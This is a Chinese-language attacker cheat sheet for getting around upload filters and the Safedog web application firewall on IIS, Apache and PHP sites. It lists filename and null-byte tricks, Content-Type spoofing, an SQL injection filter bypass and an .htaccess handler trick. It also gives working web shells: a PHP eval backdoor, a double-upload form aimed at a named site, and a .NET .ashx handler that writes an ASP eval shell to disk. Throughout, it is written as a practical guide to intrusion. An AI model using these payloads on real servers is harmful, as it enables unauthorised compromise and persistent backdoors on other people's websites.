突破各种安全软件 安全狗 继续渗透 上传
抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg
火狐FIREBUG修改本地JS
upfile/upfile_other.asp upfile_photo.asp upfile_flash.asp
asa cer asaspp
隐藏表单,hidden修改数据,file
00 1.asp;.jpg
十六进制00: 1.asp
双文件上传
文件名大小写突破,对于LINUX等非WINDOWS系统
asp空格
asp.
/xx.jpg%00.php
cecerr aasasa
Content-Type: image/gif (原为 Content-Type: text/plain)
上传一个shtml文件, 内容为: <!--#include file="conn.asp"--> 直接查看源文件,找数据库,然后...
apache的解析漏洞(上传1.php.hack,因为hack非法后缀,所以直接当作php执行了.
文件名为www.xxx.com/1.asp;1.jpg。这样的会被IIS安全狗果断屏蔽。改成如下名称,IIS6一样会解析:www.xxx.com/;1.asp;1.jpg
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。但如果:seo.asp?seo.com=%00.&id=69%20 and 1=1
利用.htaccess突破限制:
1.首先上传.htaccess文件到某目录下,.htacess规则:
<FilesMatch "hahahe">
SetHandler application/x-httpd-php
</FilesMatch>
2.再上传一个文件,后缀任意写,内容:
"hahahe"<?php @eval($_POST['dukong']);?>
双文件上传突破:
<form action="http://www.syxldwgy.com/upfile_Other.asp " method="post" name="form1" enctype="multipart/form-data"> <input name="FileName1" type="FILE" class="tx1" size="20"> <input name="FileName2" type="FILE" class="tx1" size="20"> <input type="submit" name="Submit" value="上传"> </form>
.ashx文件.NET 生成root.asp一句话马:
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); file1.Write("<%eval request("mima")%>"); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } }